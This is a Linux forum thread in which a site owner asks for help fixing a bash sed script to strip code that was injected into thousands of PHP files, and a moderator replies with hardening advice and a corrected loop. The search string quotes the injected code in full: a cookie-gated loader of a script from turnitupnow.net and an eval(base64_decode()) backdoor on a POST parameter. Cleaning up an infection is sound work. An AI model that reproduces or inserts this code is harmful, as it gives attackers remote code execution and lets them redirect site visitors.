LinuxQuestions.org
Share your knowledge at the LQ Wiki.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
User Name
Password
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!

Notices


Reply
  Search this Thread
Old 11-11-2011, 05:46 AM   #1
seabro
LQ Newbie
 
Registered: Jan 2010
Posts: 26

Rep: Reputation: 0
Could you help me get a script working?


Hi all,

I had my website hacked and thousands of files have a malicious script added inside PHP files.

I have tried to remove the code using a script I located online but it fails.

I think the problem is due to use of special characters in the string I am searching for.

Here it is, if you could help me make it work I would be very grateful.


# ************************************************** ***************************************
# find_and_replace_in_files.sh
# This script does a recursive, case sensitive directory search and replace of files
# To make a case insensitive search replace, use the -i switch in the grep call
# uses a startdirectory parameter so that you can run it outside of specified directory - else this script will modify itself!
# ************************************************** ***************************************
!/bin/bash
# **************** Change Variables Here ************
startdirectory="/path/to/public_html/"
searchterm="global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }"
replaceterm=""
# ************************************************** ********

echo "******************************************"
echo "* Search and Replace in Files Version .1 *"
echo "******************************************"

for file in $(grep -l -R $searchterm $startdirectory)
do
sed -e "s/$searchterm/$replaceterm/ig" $file > /tmp/tempfile.tmp
mv /tmp/tempfile.tmp $file
echo "Modified: " $file
done

echo " *** Yay! All Done! *** "



Many thanks,
sean
 
Old 11-11-2011, 07:01 AM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,341
Blog Entries: 55

Rep: Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538
Quote:
Originally Posted by seabro View Post
I had my website hacked
I'm sorry to hear that.


Quote:
Originally Posted by seabro View Post
thousands of files have a malicious script added inside PHP files. I have tried to remove the code
I hope you took measures to prevent that from happening again. Plugging holes should start by finding out how the culprit came in (stolen FTP credentials, SSH brute forcing lame password) or how the abuse else could have happened (lackadaisical access permissions, vulnerable software versions) and could mean installing the newest version of any shopping cart, web log, statistics, web site, forum or plugin or other software in your web stack you use, and removing versions (and installation files) of software that is no longer maintained by its developers. (And if your "thousands of files" are the result of self-coded work then consider using a tool that is safe to use instead.) If you have not done any of the above then I suggest you do that before thinkng about trying to revert back changes. If holes are left unplugged chances are those malicious changes will be back before you can say " *** Yay! All Done! *** ".


Quote:
Originally Posted by seabro View Post
I think the problem is due to use of special characters in the string I am searching for.
While we can't have members post malicious code here but I wouldn't mind you passing it on to me via email. But code excerpt only please. If you manage to blithely send me a complete web page with like 1 line of malicious script code you simply won't get any reply back.
 
Old 11-11-2011, 07:14 AM   #3
seabro
LQ Newbie
 
Registered: Jan 2010
Posts: 26

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by unSpawn View Post
I'm sorry to hear that.



I hope you took measures to prevent that from happening again. Plugging holes should start by finding out how the culprit came in (stolen FTP credentials, SSH brute forcing lame password) or how the abuse else could have happened (lackadaisical access permissions, vulnerable software versions) and could mean installing the newest version of any shopping cart, web log, statistics, web site, forum or plugin or other software in your web stack you use, and removing versions (and installation files) of software that is no longer maintained by its developers. (And if your "thousands of files" are the result of self-coded work then consider using a tool that is safe to use instead.) If you have not done any of the above then I suggest you do that before thinkng about trying to revert back changes. If holes are left unplugged chances are those malicious changes will be back before you can say " *** Yay! All Done! *** ".



While we can't have members post malicious code here but I wouldn't mind you passing it on to me via email. But code excerpt only please. If you manage to blithely send me a complete web page with like 1 line of malicious script code you simply won't get any reply back.

Hi,

The problem was with an old piece of gallery software I no longer use. It has since been removed.

The code is shown in my original post although that is not the only part of the attack. I had some tmp_xxxx.php files created and modifications to .htaccess.

The problem has been plugged, I just need to clean my .php files now.

Thanks,
Seabro
 
Old 11-11-2011, 07:26 AM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,341
Blog Entries: 55

Rep: Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538Reputation: 3538
Quote:
Originally Posted by seabro View Post
The problem was with an old piece of gallery software I no longer use. It has since been removed.
Good, good.


Quote:
Originally Posted by seabro View Post
The code is shown in my original post
No, I meant the code that latched itself onto your PHP files. Although the "for" loop part could use some work as there's no need for temp files or replacement string and a "while" loop works better if there's any spaces in file names:
Code:
grep -l -R "$searchterm"  "$startdirectory" 2>/dev/null| while read ITEM; do sed -i "s|$searchterm||ig" "${ITEM}"; done
 
Old 03-25-2012, 09:04 PM   #5
indyloft
LQ Newbie
 
Registered: Mar 2012
Posts: 1

Rep: Reputation: Disabled
I just encountered Seabro's issue and manage to find this thread. Unspawn or Seabro, could you pls share the code that can wipe it off? Damn turnitupnow..
 
Old 03-26-2012, 03:22 AM   #6
seabro
LQ Newbie
 
Registered: Jan 2010
Posts: 26

Original Poster
Rep: Reputation: 0
hey indyloft,

sorry to hear of your problem.

Its been a while since this happened to me but I believe I ended up using 'sed'

Check it out, it can run through a load of files and modify the contents. I used it simple to remove the unwanted code. They is probably another way which is much better but 'sed' worked for me.

Good luck.

seabro
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
[SOLVED] My script is not working right kenny53067 Linux - Newbie 5 07-24-2011 01:08 AM
script is not working vaibhavs17 Linux - Newbie 1 08-25-2010 01:58 PM
Crontab is not working, the script is working arfal SUSE / openSUSE 6 02-08-2010 08:48 PM
SH Script not working PEACEYALL Linux - General 3 03-21-2005 08:58 AM
Help get this script working please rickenbacherus Linux - General 2 03-24-2004 06:25 PM


All times are GMT -5. The time now is 01:04 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration